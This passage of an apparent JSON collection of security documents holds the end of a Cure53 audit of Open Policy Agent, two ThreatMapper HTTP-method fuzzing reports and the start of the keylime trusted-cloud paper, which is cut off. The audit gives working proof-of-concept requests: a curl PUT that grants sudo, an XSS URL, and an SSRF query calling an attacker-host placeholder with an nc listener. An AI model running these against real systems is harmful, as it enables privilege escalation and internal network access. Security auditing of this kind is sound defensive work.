vulnerability is\nadditionally given a unique identifier (e.g. OPA-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nOPA-01-001 Server: Insecure default config allows bypassing policies (Medium)\nWhen setting up OPA in conjunction with PAM for sudo authorization, in accordance with\nthe documentation2, it became clear that bypassing policy is a possibility. This could, in\nturn, be escalated to root privileges in the default setup. The problem is due to a\nmisconfiguration of the OPA server which allows access to the OPA endpoints. These\ncan then can be abused to corrupt policies or datasets, meaning that a regular user can\ncorrupt the dataset and be granted sudo access.\nFig.: Regular policy check through PAM module and OPA\nThe figure above illustrates the interplay between the host running the PAM module and\nthe OPA server responsible for checking the policies. Under normal circumstances, test\nuser would not be able to execute sudo since the admin group only contains the ops\nuser.\nDue to the fact that OPA does not restrict access to any of its endpoints, an attacker can\nsimply corrupt the dataset and add any user to the admin group. Below is the Proof-of-\nConcept (PoC) command which shows how to achieve this.\n \n2 https://www.openpolicyagent.org/docs/ssh-and-sudo-authorization.html\nCure53, Berlin \u00b7 08/30/18 6/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nPoC for modifying the admin group:\ncurl -X PUT <opa server ip>:<opa server port>/v1/data/roles -d \\\n'{\n \"admin\": [\"ops\", \"test\"]\n}'\nOnce the dataset has been corrupted, test user obtains a capacity to execute sudo.\nAlthough OPA provides a mechanism to restrict endpoint access3, none of this has been\nmentioned in the tutorial documentation. Unless an administrator explicitly looks for that\ninformation, it is hard to find it and, as a result, its absence potentially leads to insecure\nconfigurations.\nIt is recommended to update the documentation to mention potential security\nimplications and refer to the security documentation linked above. Moreover, the\nimportance of a secure OPA configuration should be stressed because the overall\nsecure deployment of OPA heavily relies on proper configuration and policies. In that\ncontext, a secure-by-default approach should be ideally considered and could signify\nenabling token/basic authentication out of the box with the option to manually disable it if\nnecessary.\nOPA-01-005 Server: OPA query interface vulnerable to XSS (High)\nAfter the analysis of the template files inside the OPA\u2019s web interface, it was noticed\nthat the relevant query interface is vulnerable to simple XSS attacks. This is because\nthe templates of the query form and the query result contain unsanitized user-input. A\nsnippet of the vulnerable code can be seen next.\nAffected File:\nserver/server.go\nAffected Code:\nfunc renderQueryForm(w http.ResponseWriter, qStrs []string, inputStrs []string,\nexplain types.ExplainModeV1) {\n[...]\nfmt.Fprintf(w, `\n<form>\n Query:<br>\n<textarea rows=\"10\" cols=\"50\" name=\"q\"> %s</textarea><br>\n<br>Input Data (JSON):<br>\n<textarea rows=\"10\" cols=\"50\" name=\"input\">%s</textarea><br>\n<br><input type=\"submit\" value=\"Submit\"> Explain:\n3 https://www.openpolicyagent.org/docs/security.html#authentication-and-authorization\nCure53, Berlin \u00b7 08/30/18 7/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n<input type=\"radio\" name=\"explain\" value=\"off\" %v>Off\n<input type=\"radio\" name=\"explain\" value=\"full\" %v>Full\n</form>`, query, input, explainRadioCheck[0], explainRadioCheck[1])\n}\n[...]\nfunc renderQueryResult(w io.Writer, results interface{}, err error, t0 \ntime.Time) {\n[...]\nif err != nil {\nfmt.Fprintf(w, \"Query error (took %v): <pre> %v</pre>\", d, err)\n} else if err2 != nil {\nfmt.Fprintf(w, \"JSON marshal error: <pre> %v</pre>\", err2)\n} else {\nfmt.Fprintf(w, \"Query results (took %v):<br>\", d)\nfmt.Fprintf(w, \"<pre>%s</pre>\", string(buf))\n}\n}\nThe vulnerability can also be demonstrated by sending an administrator with local\naccess to OPA to the following URL. Upon a visit to this item, XSS is directly triggered\nat two different locations in the output.\nPoC URL:\nhttp://localhost:8181/?q=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C\n%2Fscript%3E&input=%7B%7D%0D%0A&explain=full\nRendered Response:\n<form>\nQuery:<br>\n<textarea rows=\"10\" cols=\"50\" \nname=\"q\"></textarea><script>alert(1)</script> </textarea><br>\n<br>Input Data (JSON):<br>\n<textarea rows=\"10\" cols=\"50\" name=\"input\">{}\n</textarea><br>\n<br><input type=\"submit\" value=\"Submit\"> Explain:\n<input type=\"radio\" name=\"explain\" value=\"off\" >Off\n<input type=\"radio\" name=\"explain\" value=\"full\" checked>Full\n</form>Query error (took 2.656683ms): <pre>1 error occurred: 1 error occurred: \n1:1: rego_parse_error: no match found\n</textarea><script>alert(1)</script>\nEspecially with vulnerabilities like OPA-01-001, where direct OPA access is required for\na successful exploit, this XSS issue can prove very valuable for attackers seeking an\nadministrator to issue requests on their behalf. It is thus recommended to sanitize all\nuser-input reflected in the rendered HTML pages. As a short-term solution, it is possible\nCure53, Berlin \u00b7 08/30/18 8/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nto simply make sure that the reflected values do not contain dangerous characters like\n<,>, \" or '. However, more durable and long-term approach would be to consider an\nHTML sanitizer like bluemonday4, as this is necessary to globally protect all HTML\npages.\nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nOPA-01-002 Server: Query interface can be abused for SSRF (Medium)\nBy default, the OPA server exposes a query interface, therefore allowing to execute\nrego queries by sending a GET request to the given endpoint. It needs to be underlined\nthat rego provides several built-in functions, one of which is called http.send. As the\nname suggests, it sends HTTP requests to a given URL. This built-in function, in\ncombination with the query endpoint, allows an attacker to send requests originating\nfrom the OPA server. As such, it can be used for triggering Server-Side Request Forgery\n(SSRF)5. In other words, the flaw can be leveraged to gain access to internal-only\nservices and this can lead to further attacks.\nAn attacker has full control over the request method, the URL and the request body.\nBelow is a Proof-of-Concept (PoC) command executing curl, which triggers a GET\nrequest being sent to the attacker\u2019s server.\nPoC command:\ncurl 'http://<opa ip>:<opa port>/v1/query?q=http.send (%7B%22method%22%3A%22get\n%22%2C%22url%22%3A%22http%3A%2F%2F <attacker ip>%3A<attacker port>%2F%22%7D%2C\n%20yolo)%0A'\nThe incoming request, depicted for the server, can be found next.\nIncoming request:\n$ nc -lvp 31337\nListening on [0.0.0.0] (family 0, port 31337)\nConnection from [redacted] 57433 received!\nGET / HTTP/1.1\nHost: [redacted]:31337\nUser-Agent: Go-http-client/1.1\n4 https://github.com/microcosm-cc/bluemonday5 https://www.owasp.org/index.php/Server_Side_Request_Forgery\nCure53, Berlin \u00b7 08/30/18 9/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nAccept-Encoding: gzip\nIt is recommended to either remove the http.send built-in function, or, if that is not\npossible, restrict access to the query endpoint by default. In other words, endpoints\nshould be equipped with access only if explicitly configured to do so. Restricting access\nto the endpoints still makes the risk of having a policy that passes user-input into the\nfunction persistent. This may result in SSRF depending on the handling of that input.\nOPA-01-003 Server: Unintended behavior due to unclear documentation (Medium)\nNote: During the test this issue was discussed with the developers because it was\nunclear whether or not this the observed behavior was intended or indeed comprised a\nlogical flaw. A quick answer from the developers provided Cure53 with a link to an\nalready existing GitHub issue6 which reports on the exact same problem.\nOPA can authenticate and authorize client requests and this is enabled by passing two\narguments through the command line when starting the server daemon. It was\ndiscovered that a token-based authentication is only active in combination with enabled\nauthorization. In essence, when the user enables the token-based authentication without\nenabling the basic authorization, the result is that neither the authentication nor the\nauthorization is active.\nThis behavior is not reflected in the documentation and can therefore lead to insecure\nconfigurations where the user thinks authentication is enabled, even though in fact it is\nnot. What follows is the code responsible for this behavior.\nAffected File:\nopa-master/server/server.go\nAffected Code:\nfunc (s *Server) Init(ctx context.Context) (*Server, error) {\n// Add authorization handler. This must come BEFORE authentication\nhandler\n// so that the latter can run first.\nswitch s.authorization {\ncase AuthorizationBasic:\ns.Handler = authorizer.NewBasic(s.Handler, s.getCompiler, s.store)\n}\nswitch s.authentication {\ncase AuthenticationToken:\ns.Handler = identifier.NewTokenBased(s.Handler)\n6 https://github.com/open-policy-agent/opa/issues/901\nCure53, Berlin \u00b7 08/30/18 10/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n}\nThe sole purpose of the authentication handler is to extract a Bearer token from the\nAuthorization HTTP header and pass it as an input parameter for policies. However, the\nactual system policy checking is only performed in the authorization handler.\nIt is recommended to update the documentation to clearly reflect this behavior so that\nmisunderstandings or wrong interpretations can be avoided.\nOPA-01-004 Server: Denial of Service via GZip bomb in bundles (Info)\nOPA can be configured to fetch rules from a remote HTTP server via so-called bundles.\nThe files inside a bundle are tar.gz-compressed. It was discovered that OPA trusts the\napplied compression as it does not establish any potential size limits. This allows to\ncause a Denial of Service (DoS) by providing a bundle file which will consume the\nmemory of the server and therefore crash OPA.\nThis attack requires that an attacker can either MitM the connection between OPA and\nthe remote HTTP server or already has full control over the remote server.\nThe following code snippet is responsible for parsing bundle files. As soon as io.Copy is\nreached, the bundle will be decompressed and the memory exhaustion will be triggered\nAffected File:\nopa-master/bundle/bundle.go\nAffected Code:\n// Read returns a new Bundle loaded from the reader.\nfunc Read(r io.Reader) (Bundle, error) {\ngr, err := gzip.NewReader(r)\ntr := tar.NewReader(gr)\nfor {\nheader, err := tr.Next()\n[...]\nvar buf bytes.Buffer\nio.Copy(&buf, tr)\nIt is recommended to consider replacing io.Copy with io.CopyN7. The latter allows to\nspecify the maximum number of bytes that should be read. By properly defining the limit,\nit can be assured that a GZip compression bomb cannot easily cause a Denial-of-\nService.\n7 https://golang.org/pkg/io/#CopyN\nCure53, Berlin \u00b7 08/30/18 11/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nOPA-01-006 Server: Path mismatching via HTTP redirects (Info)\nIt was discovered that variables in policies match and allow \"..\" in path queries. This\ncould introduce security issues in case a developer is not aware of the behavior. As an\nexample, the existing /cars/<car_id> policy was modified to demonstrate the flaw. The\nreceived car_id variable is passed to the built-in http.send function. The standard HTTP\nGo client does not normalize the defined URL. Therefore, \"..\" is used in the HTTP path.\nDepending on the HTTP server listening at example.com, this could trigger a\nnormalization of the path via a HTTP redirect. As the used Go client is configured to\nfollow redirects, this could cause a path mismatch, thus bypassing the logic of the\ndeployed application.\nExample Command:\ncurl \"http://172.31.18.77:8080/cars/ %2e%2e\"\nFile:\nAuthz.rego\nExample Policy:\nallow {\ninput.method = \"GET\"\ninput.path = [\"cars\", car_id]\n# car_id contains \"..\"\nconcat(\"/\",[\"http://example.com\",\"test\", car_id,\"abcd\"],output)\nhttp.send({\"method\":\"get\", \"url\":output}, yolo)\n}\nExample.com HTTP Log:\n\"GET /test/../abcd HTTP/1.1\"\nAffected File:\nOpa-master\\topdown\\http.go\nAffected Code:\nfunc createHTTPClient() {\n[...]\nclient = &http.Client{\n// CheckRedirect not defined\nTimeout: timeout,\n}\nConsideration should be given to preventing potential path traversal issue by disallowing\n\"..\" in rego path variables. In case this is not feasible, Go HTTP client should be used to\ndefine the CheckRedirect property. Support for HTTP redirects needs to be disabled.\nCure53, Berlin \u00b7 08/30/18 12/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nConclusions\nThe results of this Cure53 security assessment of the OPA compound are positive. With\nthe generous funding from The Linux Foundation/ CNCF, six testers from the Cure53\nproject could spend eighteen days on the test-targets in the OPA scope. Notably, both\npenetration testing and code auditing were performed during this August 2018 project,\nmaking a low number of six findings very praiseworthy against for this rather complex\nframework. This demonstrates that security has been taking center-stage in the\ndevelopment and deployment put forward by the OPA maintainers.\nRight from the start, it needs to be noted that a decision to rely on the Go language\nclearly translated, in a security sense, to very positive outcomes. Vulnerabilities,\nstanding at two, were few and far between, with general issues also coming up to a low\ntotal of four. Paired with that is the cleanly written OPA code, which is easy to read and\ngrasp. All in all, the OPA framework lends itself well to auditing and testing, while also\nachieving good results in terms of robustness and impenetrability.\nThe core application is well-written and made it - together with the Go traits - impossible\nfor any memory corruption attacks to be found during this project. Overall, the attack\nsurfaces of OPA heavily relies on proper configuration, as evidenced by the three early\ndiscoveries (i.e. OPA-01-001, OPA-01-002 and OPA-01-003). Besides the configuration,\nthe integration and interplay between the OPA server/library and the application itself is\nof major importance for security. In this context, flaws in the application that employs the\nOPA framework may lead to exploitable scenarios relevant for the core product,\nspecifically allowing bypasses of the policy checks. It is therefore crucially important to\nalways integrate OPA into an application carefully and with an explicit security focus.\nHaving said that, Cure53 specifically finds that the provided examples of\nimplementations were very minimal and straightforward, which resulted in a small attack\nsurface and absence of security-relevant issues. However, on a broader scale and for\nprojects with greater complexity, it cannot be excluded, or might even be expected, that\napplication-vulnerabilities become more likely and facilitate routes for OPA bypasses.\nWhat is more, the shared documentation was unclear and misleading at times (see\nOPA-01-001), so that arriving at a secure configuration and integration would require a\nuser to have an extensive and nearly-internal-level of knowledge. As people normally\ncannot be expected \u201cto know what to look for\u201d, this poses a risk of insecure\nconfigurations. In Cure53\u2019s view, this is an issue that should be tackled immediately. To\nadd to the documentation realm, tasks like isolating the OPA instance on a network-\nbased level have neither been described or mentioned, although network-based isolation\ncan greatly improve security outcomes.\nCure53, Berlin \u00b7 08/30/18 13/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nIn a long-term perspective, a more secure-by-default approach should be considered.\nFor example, this could focus on enabling authorization and authentication by default\nunless explicitly configured otherwise. Another proposed solution would be to bind the\nserver to 127.0.0.1 instead of 0.0.0.0, again making the former a default handling.\nAs presented in OPA-01-005, the only web page offered by OPA suffers from XSS. This\nshould be taken as an important warning when creation of further web pages occurs in\nthe future. This warrants considerable attention so that mistakes can be eradicated and\nregressions avoided.\nOverall, Cure53 feels strongly about the OPA framework being fit-for-purpose and\nsecure. While improvements can be made in terms of making documentation more\naccessible for broader audiences and ascertaining that the premise holds in more\ncomplex scenarios, the OPA generally seems to consistently treat security as a top\npriority. Even if the results suggest minor issues that could only be pivotal when\ncombined with future vulnerabilities, addressing them should be seen as surely\nbeneficial. It is believed that capitalizing on the advice furnished through the reported\nCure53\u2019s findings will improve the security of the OPA framework.\nCure53 would like to thank Torin Sandall, Tristan Swadell, Ashutosh Narkar and Tim\nHinrichs from the OPA team as well as Chris Aniszczyk of The Linux Foundation for their\nexcellent project coordination, support and assistance, both before and during this\nassignment. Special gratitude also needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin \u00b7 08/30/18 14/14" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-19 22_30_28.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin REST Project 2/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 22:30:28\nTime taken 00:04:54.007\nTotal scans performed: 2189\nIssues found: 3\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 3 3\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest HEAD https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/node-severity\nRequest POST https://164.90.157.161/deepfence/v1.5/node-severity HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod POST\nResponseContent-type: application/json\n535 Content length: \nFull response:\n{\"data\":{\"siddharth-8vcpu-agent\":{\"containers\":{},\"kubernetes_cluster_name\n\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"\n3c6bb1217b3b2388\",\"severity\":null},\"siddharth-8vcpu-console\":{\"containers\"\n:{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\":{},\"pod_scope_id\":{},\"pods\n\":{},\"probe_id\":\"35ccbb56f0e12a5d\",\"severity\":null},\"siddharth-dev-\n8vcpu-agent3\":{\"containers\":{},\"kubernetes_cluster_name\":\"\",\"pod_id_to_ip\"\n:{},\"pod_scope_id\":{},\"pods\":{},\"probe_id\":\"7726d7c69133fbc2\",\"severity\":\nnull}},\"error\":null,\"success\":true}\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #3" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-19 20_00_36.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 20:00:36\nTime taken 00:04:56.923\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Keylime", - "file_name": "tci-acm.pdf" - }, - "content": [ - { - "data": "Bootstrapping and Maintaining Trust in the Cloud\u0003\nNabil Schear\nMIT Lincoln Laboratory\nnabil@ll.mit.eduPatrick T. Cable II\nThreat Stack, Inc.\npat@threatstack.comThomas M. Moyer\nMIT Lincoln Laboratory\ntmoyer@ll.mit.edu\nBryan Richard\nMIT Lincoln Laboratory\nbryan.richard@ll.mit.eduRobert Rudd\nMIT Lincoln Laboratory\nrobert.rudd@ll.mit.edu\nABSTRACT\nToday's infrastructure as a service (IaaS) cloud environ-\nments rely upon full trust in the provider to secure appli-\ncations and data. Cloud providers do not o\u000ber the ability\nto create hardware-rooted cryptographic identities for IaaS\ncloud resources or su\u000ecient information to verify the in-\ntegrity of systems. Trusted computing protocols and hard-\nware like the TPM have long promised a solution to this\nproblem. However, these technologies have not seen broad\nadoption because of their complexity of implementation, low\nperformance, and lack of compatibility with virtualized en-\nvironments. In this paper we introduce keylime , a scal-\nable trusted cloud key management system. keylime pro-\nvides an end-to-end solution for both bootstrapping hard-\nware rooted cryptographic identities for IaaS nodes and for\nsystem integrity monitoring of those nodes via periodic at-\ntestation. We support these functions in both bare-metal\nand virtualized IaaS environments using a virtual TPM.\nkeylime provides a clean interface that allows higher level\nsecurity services like disk encryption or con\fguration man-\nagement to leverage trusted computing without being trusted\ncomputing aware. We show that our bootstrapping proto-\ncol can derive a key in less than two seconds, we can detect\nsystem integrity violations in as little as 110ms, and that\nkeylime can scale to thousands of IaaS cloud nodes.\n\u0003This material is based upon work supported by the As-\nsistant Secretary of Defense for Research and Engineering\nunder Air Force Contract No. FA8721-05-C-0002 and/or\nFA8702-15-D-0001. Any opinions, \fndings, conclusions or\nrecommendations expressed in this material are those of the\nauthor(s) and do not necessarily re\rect the views of the As-\nsistant Secretary of Defense for Research and Engineering.\nc\r2016 Massachusetts Institute of Technology. Delivered\nto the U.S. Government with Unlimited Rights, as de\fned\nin DFARS Part 252.227-7013 or 7014 (Feb 2014). Notwith-\nstanding any copyright notice, U.S. Government rights in\nthis work are de\fned by DFARS 252.227-7013 or DFARS\n252.227-7014 as detailed above. Use of this work other than\nas speci\fcally authorized by the U.S. Government may vio-\nlate any copyrights that exist in this work.\nACM acknowledges that this contribution was authored or co-authored by an em-\nployee, or contractor of the national government. As such, the Government retains\na nonexclusive, royalty-free right to publish or reproduce this article, or to allow oth-\ners to do so, for Government purposes only. Permission to make digital or hard copies\nfor personal or classroom use is granted. Copies must bear this notice and the full ci-\ntation on the \ufb01rst page. Copyrights for components of this work owned by others than\nACM must be honored. To copy otherwise, distribute, republish, or post, requires prior\nspeci\ufb01c permission and/or a fee. Request permissions from permissions@acm.org.\nACSAC \u201916, December 05-09, 2016, Los Angeles, CA, USA\nc\r2016 ACM. ISBN 978-1-4503-4771-6/16/12. . . $15.00\nDOI:http://dx.doi.org/10.1145/2991079.29911041. INTRODUCTION\nThe proliferation and popularity of infrastructure-as-a-\nservice (IaaS) cloud computing services such as Amazon\nWeb Services and Google Compute Engine means more cloud\ntenants are hosting sensitive, private, and business critical\ndata and applications in the cloud. Unfortunately, IaaS\ncloud service providers do not currently furnish the build-\ning blocks necessary to establish a trusted environment for\nhosting these sensitive resources. Tenants have limited abil-\nity to verify the underlying platform when they deploy to\nthe cloud and to ensure that the platform remains in a good\nstate for the duration of their computation. Additionally,\ncurrent practices restrict tenants' ability to establish unique,\nunforgeable identities for individual nodes that are tied to a\nhardware root of trust. Often, identity is based solely on a\nsoftware-based cryptographic solution or unveri\fable trust\nin the provider. For example, tenants often pass unprotected\nsecrets to their IaaS nodes via the cloud provider.\nCommodity trusted hardware, like the Trusted Platform\nModule (TPM) [40], has long been proposed as the solution\nfor bootstrapping trust, enabling the detection of changes to\nsystem state that might indicate compromise, and establish-\ning cryptographic identities. Unfortunately, TPMs have not\nbeen widely deployed in IaaS cloud environments due to a\nvariety of challenges. First, the TPM and related standards\nfor its use are complex and di\u000ecult to implement. Second,\nsince the TPM is a cryptographic co-processor and notan\naccelerator, it can introduce substantial performance bottle-\nnecks (e.g., 500+ms to generate a single digital signature).\nLastly, the TPM is a physical device by design and most\nIaaS services rely upon virtualization, which purposefully\ndivorces cloud nodes from the hardware on which they run.\nAt best, the limitation to physical platforms means that\nonly the cloud provider would have access to the trusted\nhardware, not the tenants [17, 20, 31]. The Xen hypervisor\nincludes a virtualized TPM implementation that links its se-\ncurity to a physical TPM [2, 10], but protocols to make use\nof the vTPM in an IaaS environment do not exist.\nTo address these challenges we identify the following de-\nsirable features of an IaaS trusted computing system:\n\u000fSecure Bootstrapping { the system should enable\nthe tenant to securely install an initial root secret into\neach cloud node. This is typically the node's long term\ncryptographic identity and the tenant chains other se-\ncrets to it to enable secure services.\n\u000fSystem Integrity Monitoring { the system should\nallow the tenant to monitor cloud nodes as they oper-ate and react to integrity deviations within one second.\n\u000fSecure Layering (Virtualization Support) { the\nsystem should support tenant controlled bootstrapping\nand integrity monitoring in a VM using a TPM in the\nprovider's infrastructure. This must be done in collab-\noration with the provider in least privilege manner.\n\u000fCompatibility { the system should allow the ten-\nant to leverage hardware-rooted cryptographic keys in\nsoftware to secure services they already use (e.g., disk\nencryption or con\fguration management).\n\u000fScalability { the system should scale to support boot-\nstrapping and monitoring of thousands of IaaS resources\nas they are elastically instantiated and terminated.\nPrior cloud trusted computing solutions address a subset\nof these features, but none achieve all. Excalibur [31] sup-\nports bootstrapping at scale, but does not allow for system\nintegrity monitoring or o\u000ber full support for tenant trusted\ncomputing inside a VM (i.e., layering). Manferdelli et al.\ncreated a system that supports secure layering and boot-\nstrapping, but does not support system integrity monitor-\ning, is incompatible with existing cryptographic services,\nand has not demonstrated cloud scale operation [25]. Fi-\nnally, the Cloud Veri\fer [34] enables system integrity mea-\nsurement and cloud scalability but does not fully address\nsecure layering or enable secure bootstrapping.\nIn this paper, we introduce keylime ; an end-to-end IaaS\ntrusted cloud key management service that supports all the\nabove desired features. The key insight of our work is to\nutilize trusted computing to bootstrap identity in the cloud\nand provide integrity measurement to support revocation,\nbut then allow high-level services that leverage these iden-\ntities to operate independently. Thus, we provide a clean\nand easy to use interface that can integrate with existing\nsecurity technologies (see Figure 1).\nWe introduce a novel bootstrap key derivation protocol\nthat combines both tenant intent and integrity measurement\nto install secrets into cloud nodes. We then leverage the\nCloud Veri\fer [34] pattern of Schi\u000bman et al. to enable pe-\nriodic attestation that automatically links to identity revo-\ncation. keylime supports the above with secure layering in\nboth bare-metal and virtualized IaaS resources in a manner\nthat minimizes trust in the cloud provider. We demonstrate\nthe compatibility of keylime by securely enabling cloud pro-\nvisioning with cloud-init1, encrypted communication with\nIPsec, con\fguration management with Puppet2, secret man-\nagement with Vault3, and storage with LUKS/dm-crypt en-\ncrypted disks. Unlike existing solutions [39, 25], these ser-\nvices don't need to be trusted computing aware, they just\nneed to use an identity key and respond to key revocations.\nFinally, we show that keylime can scale to handle thou-\nsands of simultaneous nodes and perform integrity checks\non nodes at rates up to 2,500 integrity reports (quotes) ver-\ni\fed per second. We present and evaluate multiple options\nfor deploying our integrity measurement veri\fer both in the\ncloud, in a low-cost cloud appliance based on a Raspberry\nPi, and on-premises. We show that the overhead of securely\n1http://launchpad.net/cloud-init\n2http://puppetlabs.com/\n3http://hashicorp.com/blog/vault.html\nTPM / Platform Manufacturer Enrollment Software-based Cryptographic Services Software ID Keys ID key revoked? KeylimeTrusted Computing Services Signed EKs Valid TPM? Figure 1: Interface between trusted hardware and\nexisting software-based security services via the\nkeylime trusted computing service layer.\nprovisioning a key using keylime takes less than two sec-\nonds. Finally, we \fnd that our system can detect integrity\nmeasurement violations in as little as 110ms.\n2. BACKGROUND\nTrusted Computing The TPM provides the means for\ncreating trusted systems that are amenable to system in-\ntegrity monitoring. The TPM, as speci\fed by the Trusted\nComputing Group (TCG)4, is a cryptographic co-processor\nthat provides key generation, protected storage, and crypto-\ngraphic operations. The protected storage includes a set of\nPlatform Con\fguration Registers (PCRs) where the TPM\nstores hashes. The TPM uses these registers to store mea-\nsurements of integrity-relevant components in the system.\nTo store a new measurement in a PCR, the extend opera-\ntion concatenates the existing PCR value with the new mea-\nsurement, securely hashes5that value, and stores the result-\ning hash in the register. This hash chain allows a veri\fer to\ncon\frm that a set of measurements reported by the system\nhas not been altered. This report of measurements is called\nanattestation , and relies on the quote operation, which ac-\ncepts a random nonce and a set of PCRs. These PCRs can\ninclude measurements of the BIOS, \frmware, boot loader,\nhypervisor, OS, and applications, depending on the con\fgu-\nration of the system. The TPM reads the PCR values, and\nthen signs the nonce and PCRs with a key that is only ac-\ncessible by the TPM. The key the TPM uses to sign quotes\nis called an attestation identity key ( AIK ). We denote a\nquote using Quote AIK(nonce; PCR i:di:::) for a quote us-\ningAIK from the TPM with the associated nonce and one\nor more optional PCR numbers PCR iand corresponding\ndata dithat will be hashed and placed in PCR i.\nThe TPM contains a key hierarchy for securely storing\ncryptographic keys. The root of this hierarchy is the Stor-\nage Root Key (SRK) which the owner generates during TPM\ninitialization. The SRK in turn protects the TPM AIK (s)\nwhen they are stored outside of the TPM's nonvolatile stor-\nage (NVRAM). Each TPM also contains a permanent cre-\ndential called the Endorsement Key ( EK). The TPM man-\nufacturer generates and signs the EK. The EK uniquely\nidenti\fes each TPM and certi\fes that it is a valid TPM\nhardware device. The private EK never leaves the TPM,\nis never erased, and can only be used for encryption and\ndecryption during AIK initialization to limit its exposure.\n4http://trustedcomputinggroup.org\n5TPM speci\fcation version 1.2 uses SHA-1 for measure-\nments. TPM speci\fcation version 2.0 adds SHA-256 to ad-\ndress cryptographic weaknesses in SHA-1.Integrity Measurement To measure a system component,\nthe underlying component must be trusted computing-aware .\nThe BIOS in systems with a TPM supports measurement of\n\frmware and boot loaders. TPM-aware boot loaders can\nmeasure hypervisors and operating systems [22, 19, 29]. To\nmeasure applications, the operating system must support\nmeasurement of applications that are launched, such as the\nLinux Integrity Measurement Architecture [30, 21]. One\nlimitation of approaches like IMA is the inability to mon-\nitor the run-time state of the applications. Nexus aims 